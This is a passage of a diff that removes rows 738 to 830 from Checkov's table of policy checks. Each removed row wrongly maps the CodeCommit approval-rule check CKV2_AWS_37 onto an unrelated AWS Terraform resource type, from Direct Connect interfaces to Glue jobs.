-|  738 | CKV2_AWS_37     | resource | aws_dx_hosted_public_virtual_interface                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  739 | CKV2_AWS_37     | resource | aws_dx_hosted_public_virtual_interface_accepter         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  740 | CKV2_AWS_37     | resource | aws_dx_hosted_transit_virtual_interface                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  741 | CKV2_AWS_37     | resource | aws_dx_hosted_transit_virtual_interface_accepter        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  742 | CKV2_AWS_37     | resource | aws_dx_lag                                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  743 | CKV2_AWS_37     | resource | aws_dx_private_virtual_interface                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  744 | CKV2_AWS_37     | resource | aws_dx_public_virtual_interface                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  745 | CKV2_AWS_37     | resource | aws_dx_transit_virtual_interface                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  746 | CKV2_AWS_37     | resource | aws_dynamodb_global_table                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  747 | CKV2_AWS_37     | resource | aws_dynamodb_table                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  748 | CKV2_AWS_37     | resource | aws_dynamodb_table_item                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  749 | CKV2_AWS_37     | resource | aws_ebs_default_kms_key                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  750 | CKV2_AWS_37     | resource | aws_ebs_encryption_by_default                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  751 | CKV2_AWS_37     | resource | aws_ebs_snapshot                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  752 | CKV2_AWS_37     | resource | aws_ebs_snapshot_copy                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  753 | CKV2_AWS_37     | resource | aws_ebs_volume                                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  754 | CKV2_AWS_37     | resource | aws_ec2_availability_zone_group                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  755 | CKV2_AWS_37     | resource | aws_ec2_capacity_reservation                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  756 | CKV2_AWS_37     | resource | aws_ec2_client_vpn_authorization_rule                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  757 | CKV2_AWS_37     | resource | aws_ec2_client_vpn_endpoint                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  758 | CKV2_AWS_37     | resource | aws_ec2_client_vpn_network_association                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  759 | CKV2_AWS_37     | resource | aws_ec2_client_vpn_route                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  760 | CKV2_AWS_37     | resource | aws_ec2_fleet                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  761 | CKV2_AWS_37     | resource | aws_ec2_local_gateway_route                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  762 | CKV2_AWS_37     | resource | aws_ec2_local_gateway_route_table_vpc_association       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  763 | CKV2_AWS_37     | resource | aws_ec2_tag                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  764 | CKV2_AWS_37     | resource | aws_ec2_traffic_mirror_filter                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  765 | CKV2_AWS_37     | resource | aws_ec2_traffic_mirror_filter_rule                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  766 | CKV2_AWS_37     | resource | aws_ec2_traffic_mirror_session                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  767 | CKV2_AWS_37     | resource | aws_ec2_traffic_mirror_target                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  768 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  769 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_peering_attachment              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  770 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_peering_attachment_accepter     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  771 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_route                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  772 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_route_table                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  773 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_route_table_association         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  774 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_route_table_propagation         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  775 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_vpc_attachment                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  776 | CKV2_AWS_37     | resource | aws_ec2_transit_gateway_vpc_attachment_accepter         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  777 | CKV2_AWS_37     | resource | aws_ecr_lifecycle_policy                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  778 | CKV2_AWS_37     | resource | aws_ecr_repository                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  779 | CKV2_AWS_37     | resource | aws_ecr_repository_policy                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  780 | CKV2_AWS_37     | resource | aws_ecs_capacity_provider                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  781 | CKV2_AWS_37     | resource | aws_ecs_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  782 | CKV2_AWS_37     | resource | aws_ecs_service                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  783 | CKV2_AWS_37     | resource | aws_ecs_task_definition                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  784 | CKV2_AWS_37     | resource | aws_efs_access_point                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  785 | CKV2_AWS_37     | resource | aws_efs_file_system                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  786 | CKV2_AWS_37     | resource | aws_efs_file_system_policy                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  787 | CKV2_AWS_37     | resource | aws_efs_mount_target                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  788 | CKV2_AWS_37     | resource | aws_egress_only_internet_gateway                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  789 | CKV2_AWS_37     | resource | aws_eip                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  790 | CKV2_AWS_37     | resource | aws_eip_association                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  791 | CKV2_AWS_37     | resource | aws_eks_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  792 | CKV2_AWS_37     | resource | aws_eks_fargate_profile                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  793 | CKV2_AWS_37     | resource | aws_eks_node_group                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  794 | CKV2_AWS_37     | resource | aws_elastic_beanstalk_application                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  795 | CKV2_AWS_37     | resource | aws_elastic_beanstalk_application_version               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  796 | CKV2_AWS_37     | resource | aws_elastic_beanstalk_configuration_template            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  797 | CKV2_AWS_37     | resource | aws_elastic_beanstalk_environment                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  798 | CKV2_AWS_37     | resource | aws_elasticache_cluster                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  799 | CKV2_AWS_37     | resource | aws_elasticache_parameter_group                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  800 | CKV2_AWS_37     | resource | aws_elasticache_replication_group                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  801 | CKV2_AWS_37     | resource | aws_elasticache_security_group                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  802 | CKV2_AWS_37     | resource | aws_elasticache_subnet_group                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  803 | CKV2_AWS_37     | resource | aws_elasticsearch_domain                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  804 | CKV2_AWS_37     | resource | aws_elasticsearch_domain_policy                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  805 | CKV2_AWS_37     | resource | aws_elastictranscoder_pipeline                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  806 | CKV2_AWS_37     | resource | aws_elastictranscoder_preset                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  807 | CKV2_AWS_37     | resource | aws_elb                                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  808 | CKV2_AWS_37     | resource | aws_elb_attachment                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  809 | CKV2_AWS_37     | resource | aws_emr_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  810 | CKV2_AWS_37     | resource | aws_emr_instance_group                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  811 | CKV2_AWS_37     | resource | aws_emr_security_configuration                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  812 | CKV2_AWS_37     | resource | aws_flow_log                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  813 | CKV2_AWS_37     | resource | aws_fms_admin_account                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  814 | CKV2_AWS_37     | resource | aws_fsx_lustre_file_system                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  815 | CKV2_AWS_37     | resource | aws_fsx_windows_file_system                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  816 | CKV2_AWS_37     | resource | aws_gamelift_alias                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  817 | CKV2_AWS_37     | resource | aws_gamelift_build                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  818 | CKV2_AWS_37     | resource | aws_gamelift_fleet                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  819 | CKV2_AWS_37     | resource | aws_gamelift_game_session_queue                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  820 | CKV2_AWS_37     | resource | aws_glacier_vault                                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  821 | CKV2_AWS_37     | resource | aws_glacier_vault_lock                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  822 | CKV2_AWS_37     | resource | aws_globalaccelerator_accelerator                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  823 | CKV2_AWS_37     | resource | aws_globalaccelerator_endpoint_group                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  824 | CKV2_AWS_37     | resource | aws_globalaccelerator_listener                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  825 | CKV2_AWS_37     | resource | aws_glue_catalog_database                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  826 | CKV2_AWS_37     | resource | aws_glue_catalog_table                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  827 | CKV2_AWS_37     | resource | aws_glue_classifier                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  828 | CKV2_AWS_37     | resource | aws_glue_connection                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  829 | CKV2_AWS_37     | resource | aws_glue_crawler                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
-|  830 | CKV2_AWS_37     | resource | aws_glue_job                                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                 |
